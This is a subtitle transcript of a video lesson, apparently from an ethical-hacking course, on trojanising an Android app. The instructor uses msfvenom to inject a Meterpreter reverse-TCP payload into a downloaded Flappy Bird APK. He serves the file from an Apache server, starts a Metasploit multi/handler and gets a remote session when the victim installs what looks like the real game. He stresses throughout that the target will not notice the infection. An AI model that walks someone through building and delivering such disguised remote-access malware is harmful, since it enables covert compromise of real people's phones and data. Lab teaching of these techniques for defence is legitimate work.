1
00:00:00,420 --> 00:00:01,830
Instructor: Welcome back

2
00:00:01,830 --> 00:00:06,300
time to perform an advance attack on an Android device

3
00:00:06,300 --> 00:00:09,270
or should I say this is more of a social engineering attack.

4
00:00:09,270 --> 00:00:11,970
Because we are tricking the target into installing

5
00:00:11,970 --> 00:00:14,823
an application that is infected with our payload.

6
00:00:15,870 --> 00:00:18,390
Remember in one of the previous videos,

7
00:00:18,390 --> 00:00:20,580
from the Android section where I showed you,

8
00:00:20,580 --> 00:00:24,870
that we actually had Flappy Bird application right here

9
00:00:24,870 --> 00:00:26,640
in the Android applications?

10
00:00:26,640 --> 00:00:29,280
Well, you don't see it now because I deleted it.

11
00:00:29,280 --> 00:00:32,759
But that application was actually infected with our payload

12
00:00:32,759 --> 00:00:36,060
and I'm going to show you right now how we can do that.

13
00:00:36,060 --> 00:00:37,680
The first thing that you want to do

14
00:00:37,680 --> 00:00:40,530
is you first of all want to follow this tutorial.

15
00:00:40,530 --> 00:00:42,780
And in case something doesn't work,

16
00:00:42,780 --> 00:00:45,510
you want to run these commands.

17
00:00:45,510 --> 00:00:47,430
I will just type them right now.

18
00:00:47,430 --> 00:00:50,280
And in case you watch this entire tutorial

19
00:00:50,280 --> 00:00:51,930
and something doesn't work.

20
00:00:51,930 --> 00:00:55,020
Make sure to run these three commands and try it again.

21
00:00:55,020 --> 00:01:00,020
The first command would be apt get remove Apktool.

22
00:01:00,600 --> 00:01:02,340
Once again, don't run this right now.

23
00:01:02,340 --> 00:01:03,870
I'm just showing it to you.

24
00:01:03,870 --> 00:01:06,510
And after you execute this command,

25
00:01:06,510 --> 00:01:10,470
you would want to navigate to the Firefox type Apktool.

26
00:01:10,470 --> 00:01:14,880
And from the first link you want to click on how to install.

27
00:01:14,880 --> 00:01:18,030
This will lead you to the installation of Apktool

28
00:01:18,030 --> 00:01:20,730
and you want to navigate to the Linux installation

29
00:01:20,730 --> 00:01:22,983
and follow these steps right here.

30
00:01:23,880 --> 00:01:27,093
Once you follow these steps and install the Apktool.

31
00:01:27,930 --> 00:01:29,940
Then the last command that you want to run

32
00:01:29,940 --> 00:01:34,143
is apt get install zipalign.

33
00:01:35,910 --> 00:01:38,553
But we're not going to run this at the moment.

34
00:01:39,877 --> 00:01:42,200
We're only going to run this in case something doesn't work.

35
00:01:42,200 --> 00:01:43,440
So let's give it a try.

36
00:01:43,440 --> 00:01:45,150
Let's create a payload

37
00:01:45,150 --> 00:01:48,660
and infect Flappy Bird application with it.

38
00:01:48,660 --> 00:01:50,580
So for this to work.

39
00:01:50,580 --> 00:01:52,710
We're going to need an actual payload,

40
00:01:52,710 --> 00:01:54,360
and we are also going to need

41
00:01:54,360 --> 00:01:56,880
the application of Flappy Bird.

42
00:01:56,880 --> 00:01:58,320
Let's go with Flappy Bird first.

43
00:01:58,320 --> 00:01:59,430
We all know the game.

44
00:01:59,430 --> 00:02:01,500
Most of you probably even played the game.

45
00:02:01,500 --> 00:02:03,540
So in order to download that,

46
00:02:03,540 --> 00:02:05,880
we want to be searching for the apk file.

47
00:02:05,880 --> 00:02:09,330
Remember, apk is something that we can run on Android.

48
00:02:09,330 --> 00:02:14,330
So if I type Flappy Bird apk and I search for it.

49
00:02:14,806 --> 00:02:19,440
I will find this link that says Flappy dash bird

50
00:02:19,440 --> 00:02:22,740
dot en dot up down dot com.

51
00:02:22,740 --> 00:02:27,180
Click on that link, it'll say Flappy Bird 1.3 version.

52
00:02:27,180 --> 00:02:28,530
And we want to download

53
00:02:28,530 --> 00:02:30,903
and click on this latest version right here.

54
00:02:32,100 --> 00:02:33,063
Click on download.

55
00:02:34,380 --> 00:02:35,460
It'll open this window.

56
00:02:35,460 --> 00:02:39,240
We want to click on save file and then click on okay.

57
00:02:39,240 --> 00:02:40,950
Once it finishes downloading,

58
00:02:40,950 --> 00:02:42,480
we want to navigate to this arrow.

59
00:02:42,480 --> 00:02:44,490
And we want to open the folder,

60
00:02:44,490 --> 00:02:48,300
where we have our Flappy Bird apk file installed.

61
00:02:48,300 --> 00:02:50,550
Let's also create our payload in this directory.

62
00:02:50,550 --> 00:02:52,860
So open terminal here.

63
00:02:52,860 --> 00:02:55,470
It'll open the terminal in this slash downloads directory.

64
00:02:55,470 --> 00:02:57,450
And let me just zoom this in.

65
00:02:57,450 --> 00:03:00,423
So you can see everything better.

66
00:03:01,500 --> 00:03:04,140
And once we do that, I can type ls

67
00:03:04,140 --> 00:03:07,470
and I will have this Flappy Bird application right here.

68
00:03:07,470 --> 00:03:10,260
In order to inject our payload into this,

69
00:03:10,260 --> 00:03:13,800
we're going to use a good old dash tax option

70
00:03:13,800 --> 00:03:15,330
from the msfvenom.

71
00:03:15,330 --> 00:03:17,190
And we're going to specify

72
00:03:17,190 --> 00:03:20,880
the Flappy Bird Apk file right here.

73
00:03:20,880 --> 00:03:22,590
Remember what dash X means.

74
00:03:22,590 --> 00:03:26,010
It means that it'll try to make our payload inject

75
00:03:26,010 --> 00:03:28,380
in this application right here.

76
00:03:28,380 --> 00:03:31,320
All we are left to do right now is select the payload.

77
00:03:31,320 --> 00:03:33,693
Which is going to be the good old meterpreter.

78
00:03:35,610 --> 00:03:38,490
And we want to select the LHOST to be the IP address,

79
00:03:38,490 --> 00:03:40,562
of our Kali Linux machine,

80
00:03:40,562 --> 00:03:42,600
and L port to be any port that you want.

81
00:03:42,600 --> 00:03:43,596
In our case, I'm just going to use

82
00:03:43,596 --> 00:03:46,350
five five five five as usual.

83
00:03:46,350 --> 00:03:48,990
And last option is dash O.

84
00:03:48,990 --> 00:03:51,603
And let's just call it test dot apk.

85
00:03:52,950 --> 00:03:55,320
Before you run it, just double check everything.

86
00:03:55,320 --> 00:03:57,810
You downloaded the Flappy Bird application.

87
00:03:57,810 --> 00:04:00,870
Make sure that it is an Apk file

88
00:04:00,870 --> 00:04:03,210
or that it has this Apk extension.

89
00:04:03,210 --> 00:04:05,430
You selected the correct payload.

90
00:04:05,430 --> 00:04:07,110
You select the correct IP address.

91
00:04:07,110 --> 00:04:08,970
And once all of that is done,

92
00:04:08,970 --> 00:04:12,030
you can press enter right here.

93
00:04:12,030 --> 00:04:13,560
While this is being executed,

94
00:04:13,560 --> 00:04:15,750
let's go to the second terminal

95
00:04:15,750 --> 00:04:20,750
and start our Apache two web server.

96
00:04:21,240 --> 00:04:26,240
And let's go back and we do get some error right here.

97
00:04:26,520 --> 00:04:29,130
Okay, so we got an error.

98
00:04:29,130 --> 00:04:30,510
What are we going to do?

99
00:04:30,510 --> 00:04:33,420
Let's run those three commands that I told you.

100
00:04:33,420 --> 00:04:38,403
So the first one is sudo apt get remove Apktool.

101
00:04:40,006 --> 00:04:41,490
(Instructor typing)

102
00:04:41,490 --> 00:04:42,633
Enter the password.

103
00:04:43,530 --> 00:04:47,460
It even tells us Apktool is not installed.

104
00:04:47,460 --> 00:04:50,040
Okay, we're going to ignore this at the moment

105
00:04:50,040 --> 00:04:53,640
and we are going to go to the official Apk site.

106
00:04:53,640 --> 00:04:55,770
So what does it say right here?

107
00:04:55,770 --> 00:04:58,920
Download Linux wrapper script.

108
00:04:58,920 --> 00:05:00,570
Let's go there.

109
00:05:00,570 --> 00:05:02,190
It will open this script.

110
00:05:02,190 --> 00:05:06,240
Let's control A to select everything and then copy it.

111
00:05:06,240 --> 00:05:09,570
Once we copy it, it'll tell us the next step.

112
00:05:09,570 --> 00:05:11,550
Which is download Apktool.

113
00:05:11,550 --> 00:05:12,660
But before you do that,

114
00:05:12,660 --> 00:05:17,100
it tells us right click and save link as Apktool.

115
00:05:17,100 --> 00:05:19,950
So we already copied the content of that.

116
00:05:19,950 --> 00:05:21,933
Let's just go a nano Apktool.

117
00:05:23,280 --> 00:05:26,733
Let's paste everything that we copied right here.

118
00:05:27,840 --> 00:05:30,630
We can save this as Apktool.

119
00:05:30,630 --> 00:05:35,630
And the next step is going to be download Apktool two

120
00:05:35,970 --> 00:05:37,500
Let's go find newest here.

121
00:05:37,500 --> 00:05:39,000
They gave us the link.

122
00:05:39,000 --> 00:05:40,170
And once we go right here.

123
00:05:40,170 --> 00:05:41,550
We want to download the newest one,

124
00:05:41,550 --> 00:05:44,820
which is Apktool 2.4.1.

125
00:05:44,820 --> 00:05:45,933
Let's click on that.

126
00:05:47,670 --> 00:05:49,233
Let's save the file.

127
00:05:51,660 --> 00:05:53,970
In just a few seconds it should finish the download.

128
00:05:53,970 --> 00:05:57,960
And let's go back to check out what is the third step.

129
00:05:57,960 --> 00:06:02,850
So we named the download the jar file to Apktool dot jar.

130
00:06:02,850 --> 00:06:04,560
Hmm, let's do that.

131
00:06:04,560 --> 00:06:06,870
It is in our downloads directory

132
00:06:06,870 --> 00:06:09,180
and it seems that we actually have two of these.

133
00:06:09,180 --> 00:06:10,200
So what I'm going to do

134
00:06:10,200 --> 00:06:12,153
is I'm going to remove the first one.

135
00:06:13,560 --> 00:06:16,753
And I'm going to rename the second one to.

136
00:06:19,260 --> 00:06:20,160
What did it say?

137
00:06:20,160 --> 00:06:21,450
Let's double check.

138
00:06:21,450 --> 00:06:24,300
We want to rename it to Apktool dot jar.

139
00:06:24,300 --> 00:06:26,850
So let's do that MV Apktool to the Apktool dot jar.

140
00:06:31,890 --> 00:06:33,210
Okay, great.

141
00:06:33,210 --> 00:06:35,730
The fourth step is move both of these files

142
00:06:35,730 --> 00:06:38,070
that we just downloaded and created

143
00:06:38,070 --> 00:06:40,290
to this location right here.

144
00:06:40,290 --> 00:06:43,260
And it even tells us root is needed for this.

145
00:06:43,260 --> 00:06:44,973
So let's enter the root account.

146
00:06:46,320 --> 00:06:49,920
And let's move first the Apktool

147
00:06:49,920 --> 00:06:53,220
to slash user slash local slash bin.

148
00:06:53,220 --> 00:06:55,860
And after that we can move the Apktool dot jar

149
00:06:55,860 --> 00:06:59,523
to slash user slash local slash bin.

150
00:07:00,780 --> 00:07:01,710
Great.

151
00:07:01,710 --> 00:07:05,970
And fifth step is make sure both files are executable.

152
00:07:05,970 --> 00:07:09,663
For this, we must navigate to that actual directory.

153
00:07:11,130 --> 00:07:15,967
And we want to do and type chmod plus x Apktool,

154
00:07:15,967 --> 00:07:19,980
and chmod plus x Apktool dot jar.

155
00:07:19,980 --> 00:07:20,813
Great.

156
00:07:20,813 --> 00:07:25,380
And the last step is try running Apktool via command line.

157
00:07:25,380 --> 00:07:26,703
So if I just type Apktool.

158
00:07:28,650 --> 00:07:30,330
Awesome, it works.

159
00:07:30,330 --> 00:07:34,290
So another thing that you might want to give it a try.

160
00:07:34,290 --> 00:07:36,030
Is in case our payload creation

161
00:07:36,030 --> 00:07:37,320
still doesn't work,

162
00:07:37,320 --> 00:07:40,590
make sure that you're running the command as route account.

163
00:07:40,590 --> 00:07:43,320
Matter of fact, we're going to try to create a payload

164
00:07:43,320 --> 00:07:44,790
right now as route account.

165
00:07:44,790 --> 00:07:47,190
We are not going to go back to the regular user.

166
00:07:48,090 --> 00:07:53,090
And once you do that, let's go and type the same command.

167
00:07:53,100 --> 00:07:55,860
Once again, make sure that you're a route account.

168
00:07:55,860 --> 00:07:57,750
We want to type a dash X option,

169
00:07:57,750 --> 00:08:00,720
select our apk Flappy Bird file,

170
00:08:00,720 --> 00:08:03,543
then dash P for the payload.

171
00:08:08,700 --> 00:08:10,887
And LHOST And LPORT.

172
00:08:14,359 --> 00:08:16,350
And at the end dash o.

173
00:08:16,350 --> 00:08:18,840
Now let's call it test dot apk.

174
00:08:18,840 --> 00:08:23,840
Press enter and let's see whether it will work right now.

175
00:08:23,850 --> 00:08:26,940
So this command can take a few seconds to actually execute,

176
00:08:26,940 --> 00:08:29,220
and if we don't get any error,

177
00:08:29,220 --> 00:08:31,053
that means our command worked.

178
00:08:32,429 --> 00:08:34,200
And here it is.

179
00:08:34,200 --> 00:08:36,270
It finished with no errors.

180
00:08:36,270 --> 00:08:38,190
It went through all of these steps

181
00:08:38,190 --> 00:08:40,679
of unpacking the apk and setting all

182
00:08:40,679 --> 00:08:43,679
of the permission options for our application.

183
00:08:43,679 --> 00:08:45,840
And we got the payload size right here

184
00:08:45,840 --> 00:08:48,210
and saved as test dot apk.

185
00:08:48,210 --> 00:08:50,940
Now if you still got an error,

186
00:08:50,940 --> 00:08:52,980
try running this command as well,

187
00:08:52,980 --> 00:08:57,240
which is apt get install zipalign.

188
00:08:57,240 --> 00:09:00,510
And after this installs, try creating the payload once again

189
00:09:00,510 --> 00:09:02,610
and see if it works then.

190
00:09:02,610 --> 00:09:05,910
But since we already got our payload right here.

191
00:09:05,910 --> 00:09:10,910
Let's copy it or move it to slash bar slash www slash html.

192
00:09:13,080 --> 00:09:16,980
Once again, make sure Apache tool is started.

193
00:09:16,980 --> 00:09:21,980
And if I go right here, go and visit the Google Home.

194
00:09:23,070 --> 00:09:26,823
While this opens, what I'm going to do is run MSF console.

195
00:09:29,070 --> 00:09:31,740
Going to close all of these previous tabs.

196
00:09:31,740 --> 00:09:33,513
As we don't really need them.

197
00:09:36,270 --> 00:09:38,850
And let's just wait for the MSF console to open.

198
00:09:38,850 --> 00:09:42,693
And while it does that, let's refresh our page.

199
00:09:44,670 --> 00:09:46,500
Here is our test dot apk.

200
00:09:46,500 --> 00:09:48,900
And you will notice that our payload size

201
00:09:48,900 --> 00:09:50,940
is significantly larger

202
00:09:50,940 --> 00:09:53,250
than the previous payloads that we used.

203
00:09:53,250 --> 00:09:56,940
And this is due to us adding this inside of a Flappy Bird.

204
00:09:56,940 --> 00:10:00,060
So we are not only going to run the actual payload,

205
00:10:00,060 --> 00:10:02,790
but we are also going to run the game Flappy Bird.

206
00:10:02,790 --> 00:10:06,060
And the target will have no idea that in the background,

207
00:10:06,060 --> 00:10:10,230
they executed our meterpreter reverse shell.

208
00:10:10,230 --> 00:10:13,200
Let's go and set up all of the settings right here.

209
00:10:13,200 --> 00:10:15,903
Use exploit multi handler.

210
00:10:17,460 --> 00:10:21,757
Set payload to Android meterpreter, reverse tcp,

211
00:10:24,600 --> 00:10:29,600
set LHOST, and set outport, and run the reverse TCP handler.

212
00:10:33,450 --> 00:10:34,283
Great.

213
00:10:34,283 --> 00:10:39,283
Once it does that, we can click on the test dot apk.

214
00:10:39,330 --> 00:10:41,250
It'll ask us whether we want to download.

215
00:10:41,250 --> 00:10:42,790
I'm going to click on download

216
00:10:43,770 --> 00:10:48,330
open the test dot apk, go through these settings.

217
00:10:48,330 --> 00:10:50,700
And just a quick note.

218
00:10:50,700 --> 00:10:52,620
See right here that the name

219
00:10:52,620 --> 00:10:54,660
of the actual application is different.

220
00:10:54,660 --> 00:10:56,040
It's called Flappy Bird

221
00:10:56,040 --> 00:10:59,970
and it has a different icon than to our previous palettes.

222
00:10:59,970 --> 00:11:02,430
So if the target sees this, they will think

223
00:11:02,430 --> 00:11:06,750
that they're downloading a regular Flappy Bird application.

224
00:11:06,750 --> 00:11:08,553
And let's click on install.

225
00:11:11,220 --> 00:11:12,483
Install anyway.

226
00:11:14,370 --> 00:11:19,370
And let's click first on don't send and run the application.

227
00:11:20,160 --> 00:11:23,310
And you will see straight away it actually went inside

228
00:11:23,310 --> 00:11:24,513
the Flappy Bird game.

229
00:11:25,410 --> 00:11:27,630
You can see it opened right here.

230
00:11:27,630 --> 00:11:29,550
But if we go back to Kali Linux.

231
00:11:29,550 --> 00:11:32,820
We got our meterpreter session right here.

232
00:11:32,820 --> 00:11:34,650
And we can execute all of the commands

233
00:11:34,650 --> 00:11:38,100
that we were able to execute with our previous payloads.

234
00:11:38,100 --> 00:11:40,170
How cool is that?

235
00:11:40,170 --> 00:11:42,870
Our target will have no idea that they have been infected

236
00:11:42,870 --> 00:11:44,700
because they just opened the application

237
00:11:44,700 --> 00:11:47,580
that they thought they were running.

238
00:11:47,580 --> 00:11:48,960
Now you don't have to use Flappy Bird.

239
00:11:48,960 --> 00:11:51,960
You can use any other application whatsoever as long

240
00:11:51,960 --> 00:11:53,943
as it has dot Apk extension.

241
00:11:55,320 --> 00:11:56,153
Great.

242
00:11:56,153 --> 00:11:57,900
Now that we did this in the next video,

243
00:11:57,900 --> 00:12:01,740
I will show you a way of how you can infect the target

244
00:12:01,740 --> 00:12:04,260
in a different network.

245
00:12:04,260 --> 00:12:06,900
So there is one way which is called port forwarding.

246
00:12:06,900 --> 00:12:07,920
But for that way,

247
00:12:07,920 --> 00:12:11,130
you need to actually have access to your router.

248
00:12:11,130 --> 00:12:13,260
In case you don't have access to your router.

249
00:12:13,260 --> 00:12:15,570
There is a second way by using a certain tool

250
00:12:15,570 --> 00:12:17,370
that we will cover in the next video.

251
00:12:17,370 --> 00:12:21,000
But before we do that, let's give Flappy Bird a try.

252
00:12:21,000 --> 00:12:22,980
Let's play it once.

253
00:12:22,980 --> 00:12:25,623
And let's see who will have a better score.

254
00:12:27,047 --> 00:12:29,464
(bird thuds)

255
00:12:31,080 --> 00:12:32,310
It is going a little bit slow

256
00:12:32,310 --> 00:12:33,718
because it is a virtual machine.

257
00:12:33,718 --> 00:12:34,620
(bell clanging)

258
00:12:34,620 --> 00:12:37,893
Nonetheless, you can see that the game works.

259
00:12:38,910 --> 00:12:40,890
And I actually didn't go far.

260
00:12:40,890 --> 00:12:42,810
I made it only two points.

261
00:12:42,810 --> 00:12:43,650
If you do better,

262
00:12:43,650 --> 00:12:45,480
make sure you post it in the questions.

263
00:12:45,480 --> 00:12:48,423
Nonetheless, let's get straight into the next video.